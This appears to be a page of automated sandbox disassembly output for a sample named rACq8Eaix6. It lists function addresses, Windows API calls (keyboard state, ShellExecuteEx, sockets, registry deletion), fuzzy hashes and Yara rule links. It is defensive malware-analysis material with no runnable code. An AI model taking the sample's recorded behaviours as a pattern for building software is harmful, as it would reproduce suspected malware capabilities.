Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: edbc42163f6f8ab42a989d205da09a91ac375eb9ae9b4dea0def94c6897daa5a
Instruction ID: 5069763830b688732f331fd3dcd844e8a641545df20df4aa3bc06117aaecd9b8
Opcode Fuzzy Hash: edbc42163f6f8ab42a989d205da09a91ac375eb9ae9b4dea0def94c6897daa5a
Instruction Fuzzy Hash: 9A017CF6800308BBE754A7A09D89FEB776CDB08301F0000A5BB05E2021EA349E864B74

Function 00C5D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

GetSystemMetrics.USER32(0000000F), ref: 00C5D47C
GetSystemMetrics.USER32(0000000F), ref: 00C5D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C5D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C5D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C5D716
ShowWindow.USER32(00000003,00000000), ref: 00C5D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00C5D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C5D77D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: b944e3c838f1287010065256839fd458f42cef7bf9b6bd64117e892c20338289
Instruction ID: cae876eb696dba32a77c5921dc5198e9cd4667a362d568b17c07358de9757676
Opcode Fuzzy Hash: b944e3c838f1287010065256839fd458f42cef7bf9b6bd64117e892c20338289
Instruction Fuzzy Hash: 99B18B79500215EBDF24CF69C9C57AD7BB1FF08702F048069EC5A9F299DB30AA94CB54

Function 00BD2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C0C1C7,00000004,00000000,00000000,00000000), ref: 00BD2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C0C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00BD2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C0C1C7,00000004,00000000,00000000,00000000), ref: 00C0C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C0C1C7,00000004,00000000,00000000,00000000), ref: 00C0C286

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ff322670456abe362cb33e97780a65ac06bb665126f39c34beac43af59a98f52
Instruction ID: f9fdcca1bcc7ac621ec9aaab8a640c441fc8a72919cec1a61a2fd9a3fe40fedb
Opcode Fuzzy Hash: ff322670456abe362cb33e97780a65ac06bb665126f39c34beac43af59a98f52
Instruction Fuzzy Hash: E441F834704BC09ACB399B288CCCB6FFBD2EB65310F54899FE057967A1E6719982D710

Function 00C370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C370DD

Part of subcall function 00BF0DB6: std::exception::exception.LIBCMT ref: 00BF0DEC
Part of subcall function 00BF0DB6: __CxxThrowException@8.LIBCMT ref: 00BF0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C37114
EnterCriticalSection.KERNEL32(?), ref: 00C37130
_memmove.LIBCMT ref: 00C3717E
_memmove.LIBCMT ref: 00C3719B
LeaveCriticalSection.KERNEL32(?), ref: 00C371AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C371BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C371DE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: f6514dc4a2f9ff613459243d55a77f32c0a5b411ecdc69dce9a599ae19058fed
Instruction ID: 71434dba30ea1622403613efb2ce4c75376010bbc280da9963deeb21417ec4b0
Opcode Fuzzy Hash: f6514dc4a2f9ff613459243d55a77f32c0a5b411ecdc69dce9a599ae19058fed
Instruction Fuzzy Hash: BF318376900205EBCF10EFA4DC85AAFB7B8EF45310F1441B9F904AB256DB309E55CB60

Function 00C561D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C561EB
GetDC.USER32(00000000), ref: 00C561F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C561FE
ReleaseDC.USER32(00000000,00000000), ref: 00C5620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C56246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C56257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C5902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C56291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C562B1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: a627b94726ecfbf6f6f1e61c30bc5c3439ca973a68d9af5989fbe7509c791bb9
Instruction ID: 2b767cd911f8c2116ce919d4fe99edaf48f33cfb5adfa54aadf95feecd031dd2
Opcode Fuzzy Hash: a627b94726ecfbf6f6f1e61c30bc5c3439ca973a68d9af5989fbe7509c791bb9
Instruction Fuzzy Hash: 9B316F761012147FEB154F50CC4AFEB3BA9EF49756F044065FE08AA191CA759C82CB74

Function 00C2BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C2BBC4
_memcmp.LIBCMT ref: 00C2BBE6
_memcmp.LIBCMT ref: 00C2BBFE
_memcmp.LIBCMT ref: 00C2BC11
_memcmp.LIBCMT ref: 00C2BC2B
_memcmp.LIBCMT ref: 00C2BC3E
_memcmp.LIBCMT ref: 00C2BC56
_memcmp.LIBCMT ref: 00C2BC71

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c12b458374e2c1a9d02ca6ac6f0f215203728bacc6dd8207ed85716303c28e41
Instruction ID: 83fcddffee4ffbc6c43ff50633c0eeaf4448945d4bb5822b3dd22374ccfcc4cc
Opcode Fuzzy Hash: c12b458374e2c1a9d02ca6ac6f0f215203728bacc6dd8207ed85716303c28e41
Instruction Fuzzy Hash: 29212671601A2ABBE214A615BD82FFB779C9E60358F084870FE0597A83EB24DF15C5A1

Function 00C3EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

Part of subcall function 00BEFC86: _wcscpy.LIBCMT ref: 00BEFCA9

_wcstok.LIBCMT ref: 00C3EC94
_wcscpy.LIBCMT ref: 00C3ED23
_memset.LIBCMT ref: 00C3ED56

Strings

X, xrefs: 00C3ED93

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: dbeb3e0785194fc0de52c2055de5191fd2a711bf970ab60b4435728dfcba2e3b
Instruction ID: e0ec026a9b592ed503c07bf974824825b3c7b9826fb110d945b9147a6fdc4340
Opcode Fuzzy Hash: dbeb3e0785194fc0de52c2055de5191fd2a711bf970ab60b4435728dfcba2e3b
Instruction Fuzzy Hash: 84C17F715187009FC724EF64C885A6AF7E0EF85310F14496EF8999B3A2EB70ED45CB82

Function 00C46B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C46C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C46C21
WSAGetLastError.WSOCK32(00000000), ref: 00C46C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00C46CEA
inet_ntoa.WSOCK32(?), ref: 00C46CA7

Part of subcall function 00C2A7E9: _strlen.LIBCMT ref: 00C2A7F3
Part of subcall function 00C2A7E9: _memmove.LIBCMT ref: 00C2A815

_strlen.LIBCMT ref: 00C46D44
_memmove.LIBCMT ref: 00C46DAD

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 9611ccb722d943ffa421165a9cdc2e9a842845cad0e24e764a4742e9eb4b9f53
Instruction ID: 240d31ba86e670d5b27e6a2ec675ca6c1c60e572a1ffcf4d8046e1f9380a1a68
Opcode Fuzzy Hash: 9611ccb722d943ffa421165a9cdc2e9a842845cad0e24e764a4742e9eb4b9f53
Instruction Fuzzy Hash: 6F81CF71604300ABC710EB24DC82F6AB7E9EF85714F10496EF9559B2D2EB70EE05CB92

Function 00BD1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12848e49e84796e9df6d42b1f7ce8da00185bf6674a7ce8df5d0c02c08828c1f
Instruction ID: 95f822b92e85f4661c4308a34860ddb2a2d995a351da21409d4741d654849338
Opcode Fuzzy Hash: 12848e49e84796e9df6d42b1f7ce8da00185bf6674a7ce8df5d0c02c08828c1f
Instruction Fuzzy Hash: F2715B74900109FFCB04CF99C888AAEBBB9FF85314F14859AF915AB391D734AA51CF64

Function 00C5B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(017E5450), ref: 00C5B3EB
IsWindowEnabled.USER32(017E5450), ref: 00C5B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C5B4DB
SendMessageW.USER32(017E5450,000000B0,?,?), ref: 00C5B512
IsDlgButtonChecked.USER32(?,?), ref: 00C5B54F
GetWindowLongW.USER32(017E5450,000000EC), ref: 00C5B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C5B589

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 1b8ee05e032df08535dae9390d9e02914fac79accc4177fef6a0f019d90c27d1
Instruction ID: de06b2a824244c17fe8a4fb9f7dc1997e1d8f224c4bbad3e013c177d85afcf59
Opcode Fuzzy Hash: 1b8ee05e032df08535dae9390d9e02914fac79accc4177fef6a0f019d90c27d1
Instruction Fuzzy Hash: 8271AF38600204AFDF359F55C894FBA7BA5FF09302F104059FD61972A2CB31AE85DB58

Function 00C4F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4F448
_memset.LIBCMT ref: 00C4F511
ShellExecuteExW.SHELL32(?), ref: 00C4F556

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

Part of subcall function 00BEFC86: _wcscpy.LIBCMT ref: 00BEFCA9

GetProcessId.KERNEL32(00000000), ref: 00C4F5CD
CloseHandle.KERNEL32(00000000), ref: 00C4F5FC

Strings

@, xrefs: 00C4F525

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 2405fa990505554882e0e72527a6bc327fa5c9ff96d3333c1844f910366c3086
Instruction ID: dd5021c5300b10041f85b80eb786a8de6ebe1f08b6a978e73c4a3a78a057bd08
Opcode Fuzzy Hash: 2405fa990505554882e0e72527a6bc327fa5c9ff96d3333c1844f910366c3086
Instruction Fuzzy Hash: 4D616F75A006199FCB14EF64C481AAEFBF5FF49310F1480AEE855AB351DB31AE42CB90

Function 00C30F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C30F8C
GetKeyboardState.USER32(?), ref: 00C30FA1
SetKeyboardState.USER32(?), ref: 00C31002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C31030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C3104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C31095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C310B8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0ad6eca54232830755c537f06b7570533cb465ce534c90b4151d4eff109dfd5e
Instruction ID: fb3337bc093f3b17a13d8b914da2b69b6c67c6fb5538cacaf0db1fc0d256c3ca
Opcode Fuzzy Hash: 0ad6eca54232830755c537f06b7570533cb465ce534c90b4151d4eff109dfd5e
Instruction Fuzzy Hash: F55123A05247D53DFB3A42748C15BBABEA95B0A304F0C8589E5E4868D3C2D9EEC8D750

Function 00C30D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C30DA5
GetKeyboardState.USER32(?), ref: 00C30DBA
SetKeyboardState.USER32(?), ref: 00C30E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C30E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C30E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C30EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C30EC9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 870d03345d7976e3328e8ab25841fed396a0fdb7d976d5bc0dbfbac8daae31e8
Instruction ID: 91548b5a8e81e7feac562c85d907aef672599aeafbff62755e0026c0eff120e5
Opcode Fuzzy Hash: 870d03345d7976e3328e8ab25841fed396a0fdb7d976d5bc0dbfbac8daae31e8
Instruction Fuzzy Hash: 655107A26247D53DFB3683748C65B7A7FE95B06300F18888DF1E4968C2D395AE84E750

Function 00C355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C3560A
_wcsncpy.LIBCMT ref: 00C3563F
_wcsncpy.LIBCMT ref: 00C35671
_wcsncpy.LIBCMT ref: 00C356A4
_wcsncpy.LIBCMT ref: 00C356E6
_wcsncpy.LIBCMT ref: 00C35720
_wcsncpy.LIBCMT ref: 00C3574F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: a68f9d5c04e78411b6333111e846aac48c4a4d9c91853e2a24a4847238306c99
Instruction ID: 49bb500538bb06b61351fa2fb2d94a45b25e43f5fbc5871e202bb2d957adee4c
Opcode Fuzzy Hash: a68f9d5c04e78411b6333111e846aac48c4a4d9c91853e2a24a4847238306c99
Instruction Fuzzy Hash: F2418375C2161876CB11EBF48C469DFB3F8AF05310F508996E618E3221EB34A259C7A6

Function 00C33671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C33697,?), ref: 00C3468B

Part of subcall function 00C3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C33697,?), ref: 00C346A4

lstrcmpiW.KERNEL32(?,?), ref: 00C336B7
_wcscmp.LIBCMT ref: 00C336D3
MoveFileW.KERNEL32(?,?), ref: 00C336EB
_wcscat.LIBCMT ref: 00C33733
SHFileOperationW.SHELL32(?), ref: 00C3379F

Strings

\*.*, xrefs: 00C3372D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 93f5b4468b519f22999d822839d6ea0afa0f0ca6e3434966bcf48df8d82630a4
Instruction ID: e4d85cb502017aeb6d085f77f1262583b5ce656f0150d84d2cd001303c1b52be
Opcode Fuzzy Hash: 93f5b4468b519f22999d822839d6ea0afa0f0ca6e3434966bcf48df8d82630a4
Instruction Fuzzy Hash: E641A2B1118344AEC755EF64C846ADFB7E8EF89340F00086EB49AC3251EB34D789C756

Function 00C57291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C572AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C57351
IsMenu.USER32(?), ref: 00C57369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C573B1
DrawMenuBar.USER32 ref: 00C573C4

Strings

0, xrefs: 00C5729E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: d14734f5c3ce93f16801a532c84d82071803aa198f5d30a030158c988b456de1
Instruction ID: 93f179a9f780c9d5f299188cf8c526398a2c435478edd270fda887931ea1df19
Opcode Fuzzy Hash: d14734f5c3ce93f16801a532c84d82071803aa198f5d30a030158c988b456de1
Instruction Fuzzy Hash: 76411979A44208EFDB20DF50E884A9ABBF8FF04361F148569FD15A7260D730AE98DF54

Function 00C50FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C50FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C50FFE
FreeLibrary.KERNEL32(00000000), ref: 00C510B5

Part of subcall function 00C50FA5: RegCloseKey.ADVAPI32(?), ref: 00C5101B
Part of subcall function 00C50FA5: FreeLibrary.KERNEL32(?), ref: 00C5106D
Part of subcall function 00C50FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C51090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C51058

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
